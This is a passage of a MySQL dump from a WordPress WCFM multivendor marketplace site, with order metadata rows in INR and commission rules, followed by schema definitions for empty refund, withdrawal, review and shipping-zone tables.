17,'commission_rule','a:12:{s:4:\"rule\";s:7:\"percent\";s:4:\"mode\";s:7:\"percent\";s:7:\"percent\";s:2:\"90\";s:5:\"fixed\";i:0;s:10:\"tax_enable\";s:3:\"yes\";s:8:\"tax_name\";s:0:\"\";s:11:\"tax_percent\";s:0:\"\";s:23:\"transaction_charge_type\";s:2:\"no\";s:26:\"transaction_charge_percent\";s:1:\"0\";s:24:\"transaction_charge_fixed\";s:1:\"0\";s:22:\"transaction_charge_tax\";s:1:\"0\";s:13:\"coupon_deduct\";s:3:\"yes\";}'),(154,18,'currency','INR'),(155,18,'gross_total','115'),(156,18,'gross_sales_total','115'),(157,18,'gross_shipping_cost','20'),(158,18,'gross_shipping_tax','0'),(159,18,'gross_tax_cost','0'),(160,18,'commission_tax','0'),(161,18,'transaction_charge','0'),(162,18,'commission_rule','a:12:{s:4:\"rule\";s:7:\"percent\";s:4:\"mode\";s:7:\"percent\";s:7:\"percent\";s:2:\"90\";s:5:\"fixed\";i:0;s:10:\"tax_enable\";s:3:\"yes\";s:8:\"tax_name\";s:0:\"\";s:11:\"tax_percent\";s:0:\"\";s:23:\"transaction_charge_type\";s:2:\"no\";s:26:\"transaction_charge_percent\";s:1:\"0\";s:24:\"transaction_charge_fixed\";s:1:\"0\";s:22:\"transaction_charge_tax\";s:1:\"0\";s:13:\"coupon_deduct\";s:3:\"yes\";}'),(163,19,'currency','INR'),(164,19,'gross_total','200'),(165,19,'gross_sales_total','200'),(166,19,'gross_shipping_cost','10'),(167,19,'gross_shipping_tax','0'),(168,19,'gross_tax_cost','0'),(169,19,'commission_tax','0'),(170,19,'transaction_charge','0'),(171,19,'commission_rule','a:12:{s:4:\"rule\";s:7:\"percent\";s:4:\"mode\";s:7:\"percent\";s:7:\"percent\";s:2:\"90\";s:5:\"fixed\";i:0;s:10:\"tax_enable\";s:3:\"yes\";s:8:\"tax_name\";s:0:\"\";s:11:\"tax_percent\";s:0:\"\";s:23:\"transaction_charge_type\";s:2:\"no\";s:26:\"transaction_charge_percent\";s:1:\"0\";s:24:\"transaction_charge_fixed\";s:1:\"0\";s:22:\"transaction_charge_tax\";s:1:\"0\";s:13:\"coupon_deduct\";s:3:\"yes\";}'),(172,20,'currency','INR'),(173,20,'gross_total','200'),(174,20,'gross_sales_total','200'),(175,20,'gross_shipping_cost','10'),(176,20,'gross_shipping_tax','0'),(177,20,'gross_tax_cost','0'),(178,20,'commission_tax','0'),(179,20,'transaction_charge','0'),(180,20,'commission_rule','a:12:{s:4:\"rule\";s:7:\"percent\";s:4:\"mode\";s:7:\"percent\";s:7:\"percent\";s:2:\"90\";s:5:\"fixed\";i:0;s:10:\"tax_enable\";s:3:\"yes\";s:8:\"tax_name\";s:0:\"\";s:11:\"tax_percent\";s:0:\"\";s:23:\"transaction_charge_type\";s:2:\"no\";s:26:\"transaction_charge_percent\";s:1:\"0\";s:24:\"transaction_charge_fixed\";s:1:\"0\";s:22:\"transaction_charge_tax\";s:1:\"0\";s:13:\"coupon_deduct\";s:3:\"yes\";}'),(181,21,'currency','INR'),(182,21,'gross_total','120'),(183,21,'gross_sales_total','120'),(184,21,'gross_shipping_cost','20'),(185,21,'gross_shipping_tax','0'),(186,21,'gross_tax_cost','0'),(187,21,'commission_tax','0'),(188,21,'transaction_charge','0'),(189,21,'commission_rule','a:12:{s:4:\"rule\";s:7:\"percent\";s:4:\"mode\";s:7:\"percent\";s:7:\"percent\";s:2:\"90\";s:5:\"fixed\";i:0;s:10:\"tax_enable\";s:3:\"yes\";s:8:\"tax_name\";s:0:\"\";s:11:\"tax_percent\";s:0:\"\";s:23:\"transaction_charge_type\";s:2:\"no\";s:26:\"transaction_charge_percent\";s:1:\"0\";s:24:\"transaction_charge_fixed\";s:1:\"0\";s:22:\"transaction_charge_tax\";s:1:\"0\";s:13:\"coupon_deduct\";s:3:\"yes\";}'),(190,22,'currency','INR'),(191,22,'gross_total','519'),(192,22,'gross_sales_total','519'),(193,22,'gross_shipping_cost','20'),(194,22,'gross_shipping_tax','0'),(195,22,'gross_tax_cost','0'),(196,22,'commission_tax','0'),(197,22,'transaction_charge','0'),(198,22,'commission_rule','a:12:{s:4:\"rule\";s:7:\"percent\";s:4:\"mode\";s:7:\"percent\";s:7:\"percent\";s:2:\"90\";s:5:\"fixed\";i:0;s:10:\"tax_enable\";s:3:\"yes\";s:8:\"tax_name\";s:0:\"\";s:11:\"tax_percent\";s:0:\"\";s:23:\"transaction_charge_type\";s:2:\"no\";s:26:\"transaction_charge_percent\";s:1:\"0\";s:24:\"transaction_charge_fixed\";s:1:\"0\";s:22:\"transaction_charge_tax\";s:1:\"0\";s:13:\"coupon_deduct\";s:3:\"yes\";}'),(199,23,'currency','INR'),(200,23,'gross_total','105'),(201,23,'gross_sales_total','105'),(202,23,'gross_shipping_cost','10'),(203,23,'gross_shipping_tax','0'),(204,23,'gross_tax_cost','0'),(205,23,'commission_tax','0'),(206,23,'transaction_charge','0'),(207,23,'commission_rule','a:12:{s:4:\"rule\";s:7:\"percent\";s:4:\"mode\";s:7:\"percent\";s:7:\"percent\";s:2:\"90\";s:5:\"fixed\";i:0;s:10:\"tax_enable\";s:3:\"yes\";s:8:\"tax_name\";s:0:\"\";s:11:\"tax_percent\";s:0:\"\";s:23:\"transaction_charge_type\";s:2:\"no\";s:26:\"transaction_charge_percent\";s:1:\"0\";s:24:\"transaction_charge_fixed\";s:1:\"0\";s:22:\"transaction_charge_tax\";s:1:\"0\";s:13:\"coupon_deduct\";s:3:\"yes\";}'),(208,24,'currency','INR'),(209,24,'gross_total','48'),(210,24,'gross_sales_total','48'),(211,24,'gross_shipping_cost','10'),(212,24,'gross_shipping_tax','0'),(213,24,'gross_tax_cost','0'),(214,24,'commission_tax','0'),(215,24,'transaction_charge','0'),(216,24,'commission_rule','a:12:{s:4:\"rule\";s:7:\"percent\";s:4:\"mode\";s:7:\"percent\";s:7:\"percent\";s:2:\"90\";s:5:\"fixed\";i:0;s:10:\"tax_enable\";s:3:\"yes\";s:8:\"tax_name\";s:0:\"\";s:11:\"tax_percent\";s:0:\"\";s:23:\"transaction_charge_type\";s:2:\"no\";s:26:\"transaction_charge_percent\";s:1:\"0\";s:24:\"transaction_charge_fixed\";s:1:\"0\";s:22:\"transaction_charge_tax\";s:1:\"0\";s:13:\"coupon_deduct\";s:3:\"yes\";}'),(217,25,'currency','INR'),(218,25,'gross_total','115'),(219,25,'gross_sales_total','115'),(220,25,'gross_shipping_cost','20'),(221,25,'gross_shipping_tax','0'),(222,25,'gross_tax_cost','0'),(223,25,'commission_tax','0'),(224,25,'transaction_charge','0'),(225,25,'commission_rule','a:12:{s:4:\"rule\";s:7:\"percent\";s:4:\"mode\";s:7:\"percent\";s:7:\"percent\";s:2:\"90\";s:5:\"fixed\";i:0;s:10:\"tax_enable\";s:3:\"yes\";s:8:\"tax_name\";s:0:\"\";s:11:\"tax_percent\";s:0:\"\";s:23:\"transaction_charge_type\";s:2:\"no\";s:26:\"transaction_charge_percent\";s:1:\"0\";s:24:\"transaction_charge_fixed\";s:1:\"0\";s:22:\"transaction_charge_tax\";s:1:\"0\";s:13:\"coupon_deduct\";s:3:\"yes\";}'),(226,26,'currency','INR'),(227,26,'gross_total','120'),(228,26,'gross_sales_total','120'),(229,26,'gross_shipping_cost','20'),(230,26,'gross_shipping_tax','0'),(231,26,'gross_tax_cost','0'),(232,26,'commission_tax','0'),(233,26,'transaction_charge','0'),(234,26,'commission_rule','a:12:{s:4:\"rule\";s:7:\"percent\";s:4:\"mode\";s:7:\"percent\";s:7:\"percent\";s:2:\"90\";s:5:\"fixed\";i:0;s:10:\"tax_enable\";s:3:\"yes\";s:8:\"tax_name\";s:0:\"\";s:11:\"tax_percent\";s:0:\"\";s:23:\"transaction_charge_type\";s:2:\"no\";s:26:\"transaction_charge_percent\";s:1:\"0\";s:24:\"transaction_charge_fixed\";s:1:\"0\";s:22:\"transaction_charge_tax\";s:1:\"0\";s:13:\"coupon_deduct\";s:3:\"yes\";}'),(235,27,'currency','INR'),(236,27,'gross_total','120'),(237,27,'gross_sales_total','120'),(238,27,'gross_shipping_cost','20'),(239,27,'gross_shipping_tax','0'),(240,27,'gross_tax_cost','0'),(241,27,'commission_tax','0'),(242,27,'transaction_charge','0'),(243,27,'commission_rule','a:12:{s:4:\"rule\";s:7:\"percent\";s:4:\"mode\";s:7:\"percent\";s:7:\"percent\";s:2:\"90\";s:5:\"fixed\";i:0;s:10:\"tax_enable\";s:3:\"yes\";s:8:\"tax_name\";s:0:\"\";s:11:\"tax_percent\";s:0:\"\";s:23:\"transaction_charge_type\";s:2:\"no\";s:26:\"transaction_charge_percent\";s:1:\"0\";s:24:\"transaction_charge_fixed\";s:1:\"0\";s:22:\"transaction_charge_tax\";s:1:\"0\";s:13:\"coupon_deduct\";s:3:\"yes\";}'),(244,28,'currency','INR'),(245,28,'gross_total','100'),(246,28,'gross_sales_total','100'),(247,28,'gross_shipping_cost','0'),(248,28,'gross_shipping_tax','0'),(249,28,'gross_tax_cost','0'),(250,28,'commission_tax','0'),(251,28,'transaction_charge','0'),(252,28,'commission_rule','a:12:{s:4:\"rule\";s:7:\"percent\";s:4:\"mode\";s:7:\"percent\";s:7:\"percent\";s:2:\"90\";s:5:\"fixed\";i:0;s:10:\"tax_enable\";s:3:\"yes\";s:8:\"tax_name\";s:0:\"\";s:11:\"tax_percent\";s:0:\"\";s:23:\"transaction_charge_type\";s:2:\"no\";s:26:\"transaction_charge_percent\";s:1:\"0\";s:24:\"transaction_charge_fixed\";s:1:\"0\";s:22:\"transaction_charge_tax\";s:1:\"0\";s:13:\"coupon_deduct\";s:3:\"yes\";}'),(253,29,'currency','INR'),(254,29,'gross_total','105'),(255,29,'gross_sales_total','105'),(256,29,'gross_shipping_cost','10'),(257,29,'gross_shipping_tax','0'),(258,29,'gross_tax_cost','0'),(259,29,'commission_tax','0'),(260,29,'transaction_charge','0'),(261,29,'commission_rule','a:12:{s:4:\"rule\";s:7:\"percent\";s:4:\"mode\";s:7:\"percent\";s:7:\"percent\";s:2:\"90\";s:5:\"fixed\";i:0;s:10:\"tax_enable\";s:3:\"yes\";s:8:\"tax_name\";s:0:\"\";s:11:\"tax_percent\";s:0:\"\";s:23:\"transaction_charge_type\";s:2:\"no\";s:26:\"transaction_charge_percent\";s:1:\"0\";s:24:\"transaction_charge_fixed\";s:1:\"0\";s:22:\"transaction_charge_tax\";s:1:\"0\";s:13:\"coupon_deduct\";s:3:\"yes\";}'),(262,30,'currency','INR'),(263,30,'gross_total','100'),(264,30,'gross_sales_total','100'),(265,30,'gross_shipping_cost','0'),(266,30,'gross_shipping_tax','0'),(267,30,'gross_tax_cost','0'),(268,30,'commission_tax','0'),(269,30,'transaction_charge','0'),(270,30,'commission_rule','a:12:{s:4:\"rule\";s:7:\"percent\";s:4:\"mode\";s:7:\"percent\";s:7:\"percent\";s:2:\"90\";s:5:\"fixed\";i:0;s:10:\"tax_enable\";s:3:\"yes\";s:8:\"tax_name\";s:0:\"\";s:11:\"tax_percent\";s:0:\"\";s:23:\"transaction_charge_type\";s:2:\"no\";s:26:\"transaction_charge_percent\";s:1:\"0\";s:24:\"transaction_charge_fixed\";s:1:\"0\";s:22:\"transaction_charge_tax\";s:1:\"0\";s:13:\"coupon_deduct\";s:3:\"yes\";}'),(271,31,'currency','INR'),(272,31,'gross_total','509'),(273,31,'gross_sales_total','509'),(274,31,'gross_shipping_cost','10'),(275,31,'gross_shipping_tax','0'),(276,31,'gross_tax_cost','0'),(277,31,'commission_tax','0'),(278,31,'transaction_charge','0'),(279,31,'commission_rule','a:12:{s:4:\"rule\";s:7:\"percent\";s:4:\"mode\";s:7:\"percent\";s:7:\"percent\";s:2:\"90\";s:5:\"fixed\";i:0;s:10:\"tax_enable\";s:3:\"yes\";s:8:\"tax_name\";s:0:\"\";s:11:\"tax_percent\";s:0:\"\";s:23:\"transaction_charge_type\";s:2:\"no\";s:26:\"transaction_charge_percent\";s:1:\"0\";s:24:\"transaction_charge_fixed\";s:1:\"0\";s:22:\"transaction_charge_tax\";s:1:\"0\";s:13:\"coupon_deduct\";s:3:\"yes\";}'),(289,33,'currency','INR'),(290,33,'gross_total','598'),(291,33,'gross_sales_total','598'),(292,33,'gross_shipping_cost','0'),(293,33,'gross_shipping_tax','0'),(294,33,'gross_tax_cost','0'),(295,33,'commission_tax','0'),(296,33,'transaction_charge','0'),(297,33,'commission_rule','a:12:{s:4:\"rule\";s:7:\"percent\";s:4:\"mode\";s:7:\"percent\";s:7:\"percent\";s:2:\"90\";s:5:\"fixed\";i:0;s:10:\"tax_enable\";s:3:\"yes\";s:8:\"tax_name\";s:0:\"\";s:11:\"tax_percent\";s:0:\"\";s:23:\"transaction_charge_type\";s:2:\"no\";s:26:\"transaction_charge_percent\";s:1:\"0\";s:24:\"transaction_charge_fixed\";s:1:\"0\";s:22:\"transaction_charge_tax\";s:1:\"0\";s:13:\"coupon_deduct\";s:3:\"yes\";}'),(298,34,'currency','INR'),(299,34,'gross_total','598'),(300,34,'gross_sales_total','598'),(301,34,'gross_shipping_cost','0'),(302,34,'gross_shipping_tax','0'),(303,34,'gross_tax_cost','0'),(304,34,'commission_tax','0'),(305,34,'transaction_charge','0'),(306,34,'commission_rule','a:12:{s:4:\"rule\";s:7:\"percent\";s:4:\"mode\";s:7:\"percent\";s:7:\"percent\";s:2:\"90\";s:5:\"fixed\";i:0;s:10:\"tax_enable\";s:3:\"yes\";s:8:\"tax_name\";s:0:\"\";s:11:\"tax_percent\";s:0:\"\";s:23:\"transaction_charge_type\";s:2:\"no\";s:26:\"transaction_charge_percent\";s:1:\"0\";s:24:\"transaction_charge_fixed\";s:1:\"0\";s:22:\"transaction_charge_tax\";s:1:\"0\";s:13:\"coupon_deduct\";s:3:\"yes\";}'),(307,35,'currency','INR'),(308,35,'gross_total','999'),(309,35,'gross_sales_total','999'),(310,35,'gross_shipping_cost','0'),(311,35,'gross_shipping_tax','0'),(312,35,'gross_tax_cost','0'),(313,35,'commission_tax','0'),(314,35,'transaction_charge','0'),(315,35,'commission_rule','a:12:{s:4:\"rule\";s:7:\"percent\";s:4:\"mode\";s:7:\"percent\";s:7:\"percent\";s:2:\"90\";s:5:\"fixed\";i:0;s:10:\"tax_enable\";s:3:\"yes\";s:8:\"tax_name\";s:0:\"\";s:11:\"tax_percent\";s:0:\"\";s:23:\"transaction_charge_type\";s:2:\"no\";s:26:\"transaction_charge_percent\";s:1:\"0\";s:24:\"transaction_charge_fixed\";s:1:\"0\";s:22:\"transaction_charge_tax\";s:1:\"0\";s:13:\"coupon_deduct\";s:3:\"yes\";}'),(316,36,'currency','INR'),(317,36,'gross_total','1029'),(318,36,'gross_sales_total','1029'),(319,36,'gross_shipping_cost','30'),(320,36,'gross_shipping_tax','0'),(321,36,'gross_tax_cost','0'),(322,36,'commission_tax','0'),(323,36,'transaction_charge','0'),(324,36,'commission_rule','a:12:{s:4:\"rule\";s:7:\"percent\";s:4:\"mode\";s:7:\"percent\";s:7:\"percent\";s:2:\"90\";s:5:\"fixed\";i:0;s:10:\"tax_enable\";s:3:\"yes\";s:8:\"tax_name\";s:0:\"\";s:11:\"tax_percent\";s:0:\"\";s:23:\"transaction_charge_type\";s:2:\"no\";s:26:\"transaction_charge_percent\";s:1:\"0\";s:24:\"transaction_charge_fixed\";s:1:\"0\";s:22:\"transaction_charge_tax\";s:1:\"0\";s:13:\"coupon_deduct\";s:3:\"yes\";}'),(325,37,'currency','INR'),(326,37,'gross_total','1029'),(327,37,'gross_sales_total','1029'),(328,37,'gross_shipping_cost','30'),(329,37,'gross_shipping_tax','0'),(330,37,'gross_tax_cost','0'),(331,37,'commission_tax','0'),(332,37,'transaction_charge','0'),(333,37,'commission_rule','a:12:{s:4:\"rule\";s:7:\"percent\";s:4:\"mode\";s:7:\"percent\";s:7:\"percent\";s:2:\"90\";s:5:\"fixed\";i:0;s:10:\"tax_enable\";s:3:\"yes\";s:8:\"tax_name\";s:0:\"\";s:11:\"tax_percent\";s:0:\"\";s:23:\"transaction_charge_type\";s:2:\"no\";s:26:\"transaction_charge_percent\";s:1:\"0\";s:24:\"transaction_charge_fixed\";s:1:\"0\";s:22:\"transaction_charge_tax\";s:1:\"0\";s:13:\"coupon_deduct\";s:3:\"yes\";}');
/*!40000 ALTER TABLE `wp_wcfm_marketplace_orders_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wcfm_marketplace_product_multivendor`
--

DROP TABLE IF EXISTS `wp_wcfm_marketplace_product_multivendor`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wcfm_marketplace_product_multivendor` (
  `ID` bigint(20) NOT NULL AUTO_INCREMENT,
  `product_id` bigint(20) NOT NULL,
  `parent_product_id` bigint(20) NOT NULL,
  `vendor_id` bigint(20) NOT NULL,
  `product_price` varchar(100) NOT NULL DEFAULT '0',
  `created` timestamp NOT NULL DEFAULT current_timestamp(),
  PRIMARY KEY (`ID`),
  UNIQUE KEY `marketplace_product_multivendor` (`product_id`,`parent_product_id`,`vendor_id`)
) ENGINE=InnoDB AUTO_INCREMENT=7 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wcfm_marketplace_product_multivendor`
--

LOCK TABLES `wp_wcfm_marketplace_product_multivendor` WRITE;
/*!40000 ALTER TABLE `wp_wcfm_marketplace_product_multivendor` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wcfm_marketplace_product_multivendor` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wcfm_marketplace_refund_request`
--

DROP TABLE IF EXISTS `wp_wcfm_marketplace_refund_request`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wcfm_marketplace_refund_request` (
  `ID` bigint(20) NOT NULL AUTO_INCREMENT,
  `vendor_id` bigint(20) NOT NULL,
  `requested_by` bigint(20) NOT NULL,
  `approved_by` bigint(20) NOT NULL,
  `order_id` bigint(20) NOT NULL,
  `commission_id` bigint(20) NOT NULL,
  `item_id` bigint(20) NOT NULL,
  `refunded_amount` varchar(255) NOT NULL DEFAULT '0',
  `refund_status` varchar(100) NOT NULL DEFAULT 'pending',
  `refund_reason` longtext NOT NULL,
  `is_partially_refunded` tinyint(1) NOT NULL DEFAULT 0,
  `refund_paid_date` timestamp NULL DEFAULT NULL,
  `created` timestamp NOT NULL DEFAULT current_timestamp(),
  PRIMARY KEY (`ID`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wcfm_marketplace_refund_request`
--

LOCK TABLES `wp_wcfm_marketplace_refund_request` WRITE;
/*!40000 ALTER TABLE `wp_wcfm_marketplace_refund_request` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wcfm_marketplace_refund_request` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wcfm_marketplace_refund_request_meta`
--

DROP TABLE IF EXISTS `wp_wcfm_marketplace_refund_request_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wcfm_marketplace_refund_request_meta` (
  `ID` bigint(20) NOT NULL AUTO_INCREMENT,
  `refund_id` bigint(20) NOT NULL,
  `key` varchar(255) NOT NULL,
  `value` varchar(255) NOT NULL,
  PRIMARY KEY (`ID`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wcfm_marketplace_refund_request_meta`
--

LOCK TABLES `wp_wcfm_marketplace_refund_request_meta` WRITE;
/*!40000 ALTER TABLE `wp_wcfm_marketplace_refund_request_meta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wcfm_marketplace_refund_request_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wcfm_marketplace_reverse_withdrawal`
--

DROP TABLE IF EXISTS `wp_wcfm_marketplace_reverse_withdrawal`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wcfm_marketplace_reverse_withdrawal` (
  `ID` bigint(20) NOT NULL AUTO_INCREMENT,
  `vendor_id` bigint(20) NOT NULL,
  `order_id` bigint(20) NOT NULL,
  `commission_id` bigint(20) NOT NULL,
  `payment_method` varchar(255) NOT NULL,
  `gross_total` varchar(255) NOT NULL DEFAULT '0',
  `commission` varchar(255) NOT NULL DEFAULT '0',
  `balance` varchar(255) NOT NULL DEFAULT '0',
  `withdraw_status` varchar(100) NOT NULL DEFAULT 'pending',
  `withdraw_note` longtext NOT NULL,
  `withdraw_paid_date` timestamp NULL DEFAULT NULL,
  `created` timestamp NOT NULL DEFAULT current_timestamp(),
  PRIMARY KEY (`ID`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wcfm_marketplace_reverse_withdrawal`
--

LOCK TABLES `wp_wcfm_marketplace_reverse_withdrawal` WRITE;
/*!40000 ALTER TABLE `wp_wcfm_marketplace_reverse_withdrawal` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wcfm_marketplace_reverse_withdrawal` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wcfm_marketplace_reverse_withdrawal_meta`
--

DROP TABLE IF EXISTS `wp_wcfm_marketplace_reverse_withdrawal_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wcfm_marketplace_reverse_withdrawal_meta` (
  `ID` bigint(20) NOT NULL AUTO_INCREMENT,
  `reverse_withdraw_id` bigint(20) NOT NULL,
  `key` varchar(255) NOT NULL,
  `value` varchar(255) NOT NULL,
  PRIMARY KEY (`ID`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wcfm_marketplace_reverse_withdrawal_meta`
--

LOCK TABLES `wp_wcfm_marketplace_reverse_withdrawal_meta` WRITE;
/*!40000 ALTER TABLE `wp_wcfm_marketplace_reverse_withdrawal_meta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wcfm_marketplace_reverse_withdrawal_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wcfm_marketplace_review_rating_meta`
--

DROP TABLE IF EXISTS `wp_wcfm_marketplace_review_rating_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wcfm_marketplace_review_rating_meta` (
  `ID` bigint(20) NOT NULL AUTO_INCREMENT,
  `review_id` bigint(20) NOT NULL,
  `key` varchar(255) NOT NULL,
  `value` varchar(255) NOT NULL,
  `type` varchar(200) NOT NULL,
  PRIMARY KEY (`ID`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wcfm_marketplace_review_rating_meta`
--

LOCK TABLES `wp_wcfm_marketplace_review_rating_meta` WRITE;
/*!40000 ALTER TABLE `wp_wcfm_marketplace_review_rating_meta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wcfm_marketplace_review_rating_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wcfm_marketplace_reviews`
--

DROP TABLE IF EXISTS `wp_wcfm_marketplace_reviews`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wcfm_marketplace_reviews` (
  `ID` bigint(20) NOT NULL AUTO_INCREMENT,
  `vendor_id` bigint(20) NOT NULL,
  `author_id` bigint(20) NOT NULL,
  `author_name` varchar(255) NOT NULL,
  `author_email` varchar(255) NOT NULL,
  `review_title` longtext NOT NULL,
  `review_description` longtext NOT NULL,
  `review_rating` varchar(100) NOT NULL,
  `approved` tinyint(1) NOT NULL DEFAULT 0,
  `created` timestamp NOT NULL DEFAULT current_timestamp(),
  PRIMARY KEY (`ID`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wcfm_marketplace_reviews`
--

LOCK TABLES `wp_wcfm_marketplace_reviews` WRITE;
/*!40000 ALTER TABLE `wp_wcfm_marketplace_reviews` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wcfm_marketplace_reviews` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wcfm_marketplace_reviews_response`
--

DROP TABLE IF EXISTS `wp_wcfm_marketplace_reviews_response`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wcfm_marketplace_reviews_response` (
  `ID` bigint(20) NOT NULL AUTO_INCREMENT,
  `review_id` bigint(20) NOT NULL DEFAULT 0,
  `vendor_id` bigint(20) NOT NULL DEFAULT 0,
  `author_id` bigint(20) NOT NULL,
  `author_name` varchar(255) NOT NULL,
  `author_email` varchar(255) NOT NULL,
  `reply` longtext NOT NULL,
  `reply_by` bigint(20) NOT NULL DEFAULT 0,
  `posted` timestamp NOT NULL DEFAULT current_timestamp(),
  PRIMARY KEY (`ID`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wcfm_marketplace_reviews_response`
--

LOCK TABLES `wp_wcfm_marketplace_reviews_response` WRITE;
/*!40000 ALTER TABLE `wp_wcfm_marketplace_reviews_response` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wcfm_marketplace_reviews_response` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wcfm_marketplace_reviews_response_meta`
--

DROP TABLE IF EXISTS `wp_wcfm_marketplace_reviews_response_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wcfm_marketplace_reviews_response_meta` (
  `ID` bigint(20) NOT NULL AUTO_INCREMENT,
  `review_response_id` bigint(20) NOT NULL,
  `key` varchar(255) NOT NULL,
  `value` varchar(255) NOT NULL,
  PRIMARY KEY (`ID`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wcfm_marketplace_reviews_response_meta`
--

LOCK TABLES `wp_wcfm_marketplace_reviews_response_meta` WRITE;
/*!40000 ALTER TABLE `wp_wcfm_marketplace_reviews_response_meta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wcfm_marketplace_reviews_response_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wcfm_marketplace_shipping_zone_locations`
--

DROP TABLE IF EXISTS `wp_wcfm_marketplace_shipping_zone_locations`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wcfm_marketplace_shipping_zone_locations` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `vendor_id` int(11) DEFAULT NULL,
  `zone_id` int(11) DEFAULT NULL,
  `location_code` varchar(255) DEFAULT NULL,
  `location_type` varchar(255) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wcfm_marketplace_shipping_zone_locations`
--

LOCK TABLES `wp_wcfm_marketplace_shipping_zone_locations` WRITE;
/*!40000 ALTER TABLE `wp_wcfm_marketplace_shipping_zone_locations` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wcfm_marketplace_shipping_zone_locations` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wcfm_marketplace_shipping_zone_methods`
--

DROP TABLE IF EXISTS `wp_wcfm_marketplace_shipping_zone_methods`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wcfm_marketplace_shipping_zone_methods` (
  `instance_id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `method_id` varchar(255) NOT NULL DEFAULT '',
  `zone_id` int(11) unsigned NOT NULL,
  `vendor_id` int(11) NOT NULL,
  `is_enabled` tinyint(1) NOT NULL DEFAULT 1,
  `settings` longtext DEFAULT NULL,
  PRIMARY KEY (`instance_id`)
) ENGINE=InnoDB AUTO_INCREMENT=6 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wcfm_marketplace_shipping_zone_methods`
--

LOCK TABLES `wp_wcfm_marketplace_shipping_zone_methods` WRITE;
/*!40000 ALTER TABLE `wp_wcfm_marketplace_shipping_zone_methods` DISABLE KEYS */;
